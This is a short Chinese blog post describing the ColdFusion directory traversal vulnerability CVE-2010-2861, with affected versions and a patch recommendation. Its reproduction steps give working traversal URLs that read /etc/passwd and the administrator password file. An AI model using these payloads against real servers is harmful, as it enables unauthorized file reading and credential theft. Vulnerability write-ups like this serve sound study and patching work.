coldfusion文件读取漏洞(CVE-2010-2861)

声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

漏洞描述

CVE-2010-2861

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

漏洞影响

ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4

漏洞复现

1、直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd
coldfusion文件读取漏洞(CVE-2010-2861)_第1张图片
coldfusion文件读取漏洞(CVE-2010-2861)_第2张图片

2、读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
coldfusion文件读取漏洞(CVE-2010-2861)_第3张图片
coldfusion文件读取漏洞(CVE-2010-2861)_第4张图片

解密password
coldfusion文件读取漏洞(CVE-2010-2861)_第5张图片

漏洞修复

打补丁、升级版本

你可能感兴趣的:(CVE-2010-2861)